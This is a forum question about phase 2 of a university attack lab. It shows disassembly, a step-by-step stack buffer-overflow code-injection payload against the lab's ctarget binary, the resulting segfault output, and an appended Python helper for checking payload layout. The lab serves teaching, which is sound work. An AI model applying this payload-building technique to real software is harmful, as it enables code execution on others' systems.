Attack lab phase 2: You caused a segmentation fault

Question  Votes: 0  Answers: 0

Here is the getbuf, touch1 and touch2 information from my attack lab:

00000000004018c2 <getbuf>:
  4018c2:   48 83 ec 18             sub    $0x18,%rsp
  4018c6:   48 89 e7                mov    %rsp,%rdi
  4018c9:   e8 7e 02 00 00          callq  401b4c <Gets>
  4018ce:   b8 01 00 00 00          mov    $0x1,%eax
  4018d3:   48 83 c4 18             add    $0x18,%rsp
  4018d7:   c3                      retq   

00000000004018d8 <touch1>:
  4018d8:   48 83 ec 08             sub    $0x8,%rsp
  4018dc:   c7 05 16 3c 20 00 01    movl   $0x1,0x203c16(%rip)        # 6054fc <vlevel>
  4018e3:   00 00 00 
  4018e6:   bf 57 32 40 00          mov    $0x403257,%edi
  4018eb:   e8 d0 f3 ff ff          callq  400cc0 <puts@plt>
  4018f0:   bf 01 00 00 00          mov    $0x1,%edi
  4018f5:   e8 a7 04 00 00          callq  401da1 <validate>
  4018fa:   bf 00 00 00 00          mov    $0x0,%edi
  4018ff:   e8 2c f5 ff ff          callq  400e30 <exit@plt>

0000000000401904 <touch2>:
  401904:   48 83 ec 08             sub    $0x8,%rsp
  401908:   89 fa                   mov    %edi,%edx
  40190a:   c7 05 e8 3b 20 00 02    movl   $0x2,0x203be8(%rip)        # 6054fc <vlevel>
  401911:   00 00 00 
  401914:   39 3d ea 3b 20 00       cmp    %edi,0x203bea(%rip)        # 605504 <cookie>
  40191a:   74 28                   je     401944 <touch2+0x40>
  40191c:   be a8 32 40 00          mov    $0x4032a8,%esi
  401921:   bf 01 00 00 00          mov    $0x1,%edi
  401926:   b8 00 00 00 00          mov    $0x0,%eax
  40192b:   e8 b0 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401930:   bf 02 00 00 00          mov    $0x2,%edi
  401935:   e8 2c 05 00 00          callq  401e66 <fail>
  40193a:   bf 00 00 00 00          mov    $0x0,%edi
  40193f:   e8 ec f4 ff ff          callq  400e30 <exit@plt>
  401944:   be 80 32 40 00          mov    $0x403280,%esi
  401949:   bf 01 00 00 00          mov    $0x1,%edi
  40194e:   b8 00 00 00 00          mov    $0x0,%eax
  401953:   e8 88 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401958:   bf 02 00 00 00          mov    $0x2,%edi
  40195d:   e8 3f 04 00 00          callq  401da1 <validate>
  401962:   eb d6                   jmp    40193a <touch2+0x36>

I have done all of these steps for phase 2:

  1. vim cookie.txt, in which we have the address 0x4b7a4937

  2. In vim phase2.s, write the following and save it:
     mov $0x4b7a4937, %rdi
     ret

  3. gcc -c phase2.s

  4. objdump -d phase2.o, which gives the following information:

phase2.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 c7 c7 37 49 7a 4b    mov    $0x4b7a4937,%rdi
   7:   c3                      retq

  5. Save the above in vim phase2.asm

  6. Save the answer in phase2.txt:
     48 c7 c7 37 49 7a 4b c3 // step 4 answer
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     98 28 61 55 00 00 00 00 // step 8 answer
     04 19 40 00 00 00 00 00 // touch2 address

  7. gdb ctarget > b getbuf > r > info r, which returns 0x556128b0

  8. 0x556128b0 - 0x18 = 0x55612898

  9. cat phase2.txt | ./hex2raw | ./ctarget

After running it I get the following error:

Cookie: 0x4b7a4937
Type string:Touch2!: You called touch2(0x4b7a4937)
Valid solution for level 2 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAILED

I cannot find what is wrong with my answer. I followed YouTube and GitHub, and I get the same answer.

assembly segmentation-fault stack x86-64 buffer-overflow
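Added note, not part of the question above: the hand-copying in steps 4 to 8 is where transcription slips usually creep in, so this small Python checker (my own code, not from the lab) pulls the instruction bytes out of an objdump listing, reads the frame size getbuf reserves with sub $N,%rsp, and shows where each part of a hex2raw-style answer file lands relative to the saved return address. The sample listings and answer are copied from the post; it assumes the answer file uses the /* */ block comments that hex2raw accepts.

```python
import re
# Constructed samples: the listings and answer file from the post above (comments as /* */ for hex2raw).
GETBUF_LISTING = """\
00000000004018c2 <getbuf>:
  4018c2:   48 83 ec 18             sub    $0x18,%rsp
  4018c6:   48 89 e7                mov    %rsp,%rdi
  4018d7:   c3                      retq
"""
PHASE2_LISTING = """\
0000000000000000 <.text>:
   0:   48 c7 c7 37 49 7a 4b    mov    $0x4b7a4937,%rdi
   7:   c3                      retq
"""
ANSWER_TXT = """\
48 c7 c7 37 49 7a 4b c3 /* injected code: mov $cookie,%rdi ; ret */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 28 61 55 00 00 00 00 /* return into the buffer */
04 19 40 00 00 00 00 00 /* touch2 */
"""
BYTES_RE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2} )+)")
SUB_RSP_RE = re.compile(r"sub\s+\$0x([0-9a-f]+),%rsp")

def listing_bytes(listing):
    """Concatenate the raw instruction bytes of an objdump -d listing, in order."""
    out = bytearray()
    for line in listing.splitlines():
        m = BYTES_RE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)

def frame_size(listing):
    """Bytes reserved by 'sub $N,%rsp': the buffer size and the offset of the saved return address."""
    m = SUB_RSP_RE.search(listing)
    if m is None:
        raise ValueError("no 'sub $..,%rsp' in listing")
    return int(m.group(1), 16)

def answer_bytes(text):
    """Parse a hex2raw-style answer file: hex byte pairs, /* */ comments ignored."""
    return bytes.fromhex("".join(re.sub(r"/\*.*?\*/", "", text, flags=re.S).split()))

def layout(answer, frame):
    """Split the answer into buffer contents, the overwritten return address and the slot above it."""
    if len(answer) < frame + 8:
        raise ValueError(f"{len(answer)} bytes cannot reach the return address at offset {frame}")
    return {"buffer": answer[:frame],
            "ret_addr": int.from_bytes(answer[frame:frame + 8], "little"),
            "above": answer[frame + 8:]}
```

Comparing layout(answer_bytes(ANSWER_TXT), frame_size(GETBUF_LISTING)) against listing_bytes(PHASE2_LISTING) confirms the copied bytes, the 0x18 padding and the little-endian addresses line up before anything is piped into ctarget.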